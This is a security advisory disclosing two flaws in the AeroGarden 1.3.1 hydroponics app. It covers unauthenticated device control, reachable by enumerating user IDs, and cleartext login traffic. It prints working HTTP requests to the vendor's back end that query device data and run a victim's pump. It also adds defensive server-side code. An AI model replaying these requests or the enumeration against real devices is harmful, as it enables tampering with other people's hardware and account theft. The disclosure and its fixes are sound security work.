AeroGarden Version 1.3.1 - Multiple Vulnerabilities


ADVISORY SUMMARY

AeroGrow International is a company that produces consumer hydroponic growing
hardware for plants (e.g., herbs, vegetables, and flowers). The hardware product can be
controlled with a mobile application for specific models of their hydroponic growing kits.
The project’s official website is http://www.aerogarden.com. The latest version of the
mobile application is 1.3.1.

Impact

Both identified vulnerabilities would be detrimental to AeroGarden users; an attacker could cause the devices to inflict damage to plant life or an attacker could capture traffic to access users’ account information.

Risk Level

Medium and High

Affected Vendor

  Product Vendor: AeroGrow International
  Product Name: AeroGarden
  Affected Version: 1.3.1

Vulnerabilities List and Solutions

  • Incorrect Access Controls: Implement proper access controls for user actions throughout the application.
  • Insecure Network Transmission: Enforce the use of secure channels for data transmission.

Credits

Jason Gay, Security Associate, Bishop Fox - [email protected]

Timeline

  1. 02/20/2019: Initial discovery
  2. 03/21/2019: First attempt to contact vendor
  3. 04/17/2019: First contact with vendor
  4. 07/30/2019: Public Disclosure

VULNERABILITIES

Incorrect Access Controls

This version of the AeroGarden application is affected by incorrect access controls. Any user can request information about other users’ Wi-Fi-enabled AeroGarden hardware products, and then use this information to change settings (such as water pump run time, light settings, and vacation mode settings). The vulnerability can be exploited by any remote user without authentication.

  CVE ID: N/A
  Security Risk: Medium
  Impact: Incorrect Access Control
  Access Vector: Remote

Further Details

  • CVSS Base Score: 5.3
  • CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

By observing the communication between the mobile application and the Amazon EC2 back end, the testing team found that requests to execute commands on the AeroGarden hardware required only the MAC address (airGuid) of the hardware and the numerical user ID (userID) associated with it. The testing team obtained this information by issuing the following request:

Request
POST /api/Custom/QueryUserDevice HTTP/1.1
Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept: */*
User-Agent: BountyWiFi/1.3.1 (iPhone; iOS 12.1.4; Scale/3.00)
Accept-Language: en-US;q=1
Content-Length: 12
Accept-Encoding: gzip, deflate

userID=[REDACTED]

The response returned the following information:

Response
{"configID":[REDACTED],"airGuid":[REDACTED],"lightCycle":"08000100","pumpCycle":"00050037","lightTemp":1,"lightStat":1,"clock":"160503","pumpStat":0,"pumpHydro":0,"pumpTest":1,"pumpDrain":null,"pumpDrainState":null,"pumpLevel":0,"pumpRemind4Hour":0,"gardenType":2,"plantedType":0,"plantedName":"S2l0Y2hlbg==","totalDay":120,"plantedDay":47,"nutriCycle":14,"nutriRemindDay":12,"nutriStatus":0,"alarmAllow":0,"plantedDate":"d2:40:d0:55:94:89","nutrientDate":[REDACTED]","updateDate":"2019-02-22T02:28:31","createDate":null,"swVersion":"MFW-V0.20","hwVersion":"SW-V1.18","bwVersion":"HW-V3.0","oldPlantedDay":47,"deviceID":"[REDACTED]","deviceIP":"[REDACTED]","chooseGarden":0,"oldlightCycle":null,"vacationMode":0,"bwConnectedSsid":null,"nutriStatusFlag":"0","nutriStatusDate":"0001-01-01T00:00:00","remark":null,"imgUrl":null,"timezone":"0","audioAlarmStat":0,"audioAlarmCycleSet":0,"audioAlarmCycle":null}]

By iterating through the possible 5-digit userID values during testing, the team could retrieve the MAC address (airGuid) of various units not under their control. These two values were all that was required to issue commands to the hardware.

With this information, an attacker could issue the following command to turn on the water pump for one minute:

POST /api/Custom/UpdateDeviceConfig HTTP/1.1
Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept: */*
User-Agent: BountyWiFi/1.3.1 (iPhone; iOS 12.1.4; Scale/3.00)
Accept-Language: en-US;q=1
Content-Length: 118
Accept-Encoding: gzip, deflate

airGuid=[REDACTED]&chooseGarden=0&plantConfig=%7B%0A%20%20%22pumpTest%22%20%3A%201%0A%7D&userID=[REDACTED]

It was confirmed that the unit then ran its pump for one minute. By reviewing different options within the mobile application, different commands could also be issued to alter the light cycle, set vacation mode, or return the devices to their default settings. An attacker could make the motor run until damaged or change options and timing to damage plant life in the system.

No authentication was required for exploitation.
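The root cause above is that the back end trusts the client-supplied userID and airGuid instead of the authenticated session. The following is an added illustration of the server-side check the Solution calls for; it is not AeroGrow's or Bishop Fox's code, and the ownership table, the MAC values and the list of permitted plantConfig keys are constructed placeholders.

```python
import json
from typing import Optional, Tuple
from urllib.parse import parse_qs

# Constructed ownership table (userID -> airGuid MACs) standing in for the
# back-end database. Values are placeholders, not real devices.
DEVICE_OWNERS = {
    "10001": {"AA:BB:CC:DD:EE:01"},
    "10002": {"AA:BB:CC:DD:EE:02"},
}

# Assumed allowlist of settings the app may change and the values each accepts;
# anything outside it (unknown keys, odd types) is rejected before it reaches hardware.
ALLOWED_PLANT_CONFIG = {
    "pumpTest": {0, 1},
    "vacationMode": {0, 1},
    "lightStat": {0, 1},
}


def parse_update_body(body: str) -> dict:
    """Parse the x-www-form-urlencoded body of /api/Custom/UpdateDeviceConfig.

    plantConfig is itself URL-encoded JSON (the advisory's sample decodes to
    {"pumpTest": 1}); a malformed document becomes None rather than an exception.
    """
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    try:
        fields["plantConfig"] = json.loads(fields.get("plantConfig", ""))
    except json.JSONDecodeError:
        fields["plantConfig"] = None
    return fields


def authorize_update(session_user_id: Optional[str], body: str) -> Tuple[int, str]:
    """Decide whether an UpdateDeviceConfig request may run; returns (status, reason).

    The userID field in the body is deliberately ignored: ownership is derived
    from the authenticated session, so forging userID no longer helps.
    """
    if session_user_id is None:
        return 401, "no authenticated session"
    fields = parse_update_body(body)
    air_guid = fields.get("airGuid")
    if not air_guid or air_guid not in DEVICE_OWNERS.get(session_user_id, set()):
        return 403, "device not owned by session user"
    cfg = fields["plantConfig"]
    if not isinstance(cfg, dict) or not cfg:
        return 400, "plantConfig missing or malformed"
    for key, value in cfg.items():
        if key not in ALLOWED_PLANT_CONFIG or type(value) is not int or value not in ALLOWED_PLANT_CONFIG[key]:
            return 400, f"unsupported setting {key!r}"
    return 200, "ok"
```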

Insecure Network Transmission

The AeroGarden application transmits not only requests for command execution in cleartext, but also the login credentials for the user's account.

  CVE ID: N/A
  Security Risk: High
  Impact: Information Disclosure
  Access Vector: Remote

Further Details

  • CVSS Base Score: 9.1
  • CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

As shown with the Incorrect Access Control issue in this application, network communication between the mobile application and the Amazon EC2 instance occurs over insecure HTTP channels. During testing, insecure transmission of login information from the application was observed, as shown below:

POST /api/Admin/Login HTTP/1.1
Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept: */*
User-Agent: BountyWiFi/1.3.1 (iPhone; iOS 12.1.4; Scale/3.00)
Accept-Language: en-US;q=1
Content-Length: 61
Accept-Encoding: gzip, deflate

mail=[REDACTED]&userPwd=[REDACTED]

If an attacker were able to capture this traffic, they could access a user’s account on the AeroGarden website, where they could access personal information (such as address and payment information), depending on whether the user has saved this information to the site or not.
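The Solution for this finding is to refuse cleartext channels at the server rather than rely on the client choosing HTTPS. Below is an added illustration of that enforcement as a WSGI middleware; it is not AeroGrow's or Bishop Fox's code, and the login_app stand-in, the handle() harness and the hostname are constructed for the example.

```python
from typing import Callable, Iterable, Tuple


def require_tls(app: Callable) -> Callable:
    """WSGI middleware: never hand a cleartext request to the wrapped API.

    A GET over HTTP is redirected to HTTPS. A POST over HTTP (a login form or a
    device command) has already exposed its body on the wire, and a redirect
    would only make the client replay it, so it is refused outright. Responses
    served over HTTPS get an HSTS header so browsers stop trying HTTP at all.
    """
    def wrapped(environ: dict, start_response) -> Iterable[bytes]:
        if environ.get("wsgi.url_scheme", "http") != "https":
            if environ.get("REQUEST_METHOD", "GET") == "GET":
                target = "https://%s%s" % (environ.get("HTTP_HOST", "localhost"),
                                           environ.get("PATH_INFO", "/"))
                start_response("301 Moved Permanently",
                               [("Location", target), ("Content-Length", "0")])
                return [b""]
            start_response("403 Forbidden", [("Content-Type", "text/plain")])
            return [b"cleartext HTTP is not accepted\n"]

        def hsts_start(status, headers, exc_info=None):
            headers = list(headers) + [
                ("Strict-Transport-Security", "max-age=31536000; includeSubDomains")]
            return start_response(status, headers, exc_info)

        return app(environ, hsts_start)
    return wrapped


def login_app(environ, start_response):
    """Constructed stand-in for /api/Admin/Login; only reachable through require_tls."""
    start_response("200 OK", [("Content-Type", "application/json")])
    return [b'{"result":"ok"}']


def handle(environ: dict) -> Tuple[str, dict, bytes]:
    """Push one request through the middleware; returns (status, headers, body)."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"] = status
        captured["headers"] = dict(headers)

    body = b"".join(require_tls(login_app)(environ, start_response))
    return captured["status"], captured["headers"], body
```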


About the author, Jason Gay

Senior Security Consultant

Jason Gay (CISSP, OSCP, CEH) is a Senior Security Consultant at Bishop Fox, where he focuses on product security reviews, mobile and web application penetration testing, network penetration testing, and social engineering.

Jason has been a dedicated member of the cybersecurity community for most of his life. He has contributed to numerous CVEs as a mentor, given talks ranging from "Lock Picking 101" to "Wireless Hacking with UAVs", and has created training material for businesses large and small. He has also worked closely with the Armed Forces Communications and Electronics Association (AFCEA), and he operates his local DEF CON 318 (DC318) group. Jason's research currently focuses on the Internet of Things (IoT), including Bluetooth locks and other smart home gadgets. He recently disclosed a high-risk issue in a mobile application that could be used to take over a hardware appliance for regulating plant life.
